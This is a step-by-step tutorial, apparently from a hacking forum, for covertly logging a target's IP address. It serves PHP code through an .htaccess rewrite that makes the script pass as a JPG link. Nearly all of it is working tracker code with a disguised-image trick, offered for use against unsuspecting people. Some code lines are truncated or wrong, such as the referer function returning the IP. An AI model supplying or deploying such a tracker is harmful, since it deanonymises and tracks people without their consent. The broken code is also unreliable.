Today we are going to steal someone’s IP Address by sending them an image URL, This guide is written for people who have hosting or their own VPS with a webserver running.
How to Steal IP Address via Image
STEP 1
Create a file name functions.php
<?php function getBrowser() { if (isset($_SERVER['HTTP_USER_AGENT']) && !empty($_SERVER['HTTP_USER_AGENT'])) { return $_SERVER['HTTP_USER_AGENT']; } else { return "Unknown User-Agent"; } }function getIP() {
if (function_exists('apache_request_headers')) {
$headers = apache_request_headers();
} else {
$headers = $_SERVER;
}
if ( array_key_exists( 'X-Forwarded-For', $headers ) && filter_var( $headers['X-Forwarded-For'], FILTER_VALIDATE_IP, FILTER$
return $headers['X-Forwarded-For'];
} elseif ( array_key_exists( 'HTTP_X_FORWARDED_FOR', $headers ) && filter_var( $headers['HTTP_X_FORWARDED_FOR'], FILTER_VAL$
return $headers['HTTP_X_FORWARDED_FOR'];
} else {
return filter_var( $_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 );
}
}
function getReferer() { if (isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['REMOTE_ADDR'])) { return $_SERVER['REMOTE_ADDR']; } else { return "Unknown Referer"; } } ?>
STEP 2
Create another file named log.php
<?php include 'functions.php';$browser = getBrowser();
$date = date ('m/j/y g:i A');
$ip = getIP();
$referer = getReferer();
$log = fopen('logs.txt', 'a'); fwrite($log, '['.$date.'] '.$browser.'|'.$ip.'|'.$referer."rn"); fclose($log); echo '<img src="birdy.jpg">'; ?>
STEP 3
Create a file named .htaccess
Options All -Indexes RewriteEngine on RewriteRule ^bird.jpg$ log.php <Files *.txt> Order Deny,Allow Deny from all </Files> <files ~ "^.*.([Hh][Tt][Aa])"> order allow,deny deny from all satisfy all </files>
STEP 4
Create an empty text file, and name it logs.txt
Create an empty text file, and rename it to bird.jpg
Upload a JPG file as birdy.jpg
Note: These can be named anything you want, this is just an example.
Anytime someone goes to bird.jpg on your server, it will load log.php, but the url will still show as bird.jpg
The log.php file will take the users information, save it to a text file, and display birdy.jpg, so that when we link the person, an actual image will still show.
No one will be able to access the logs.txt file. The only way to read it would be to log in to your host/vps and view it from there, so your logs are secured.
Note: The .htaccess file is essential for this to work. The htaccess file is also protected so that no one can view it. I suggest you test the script out yourself, and ensure you have your webserver properly setup to use .htaccess files, because I know some webservers and hosts do not have .htaccess files enabled by default. PM me if you need help setting this up.
Submit your Article/Tutorial? Click here
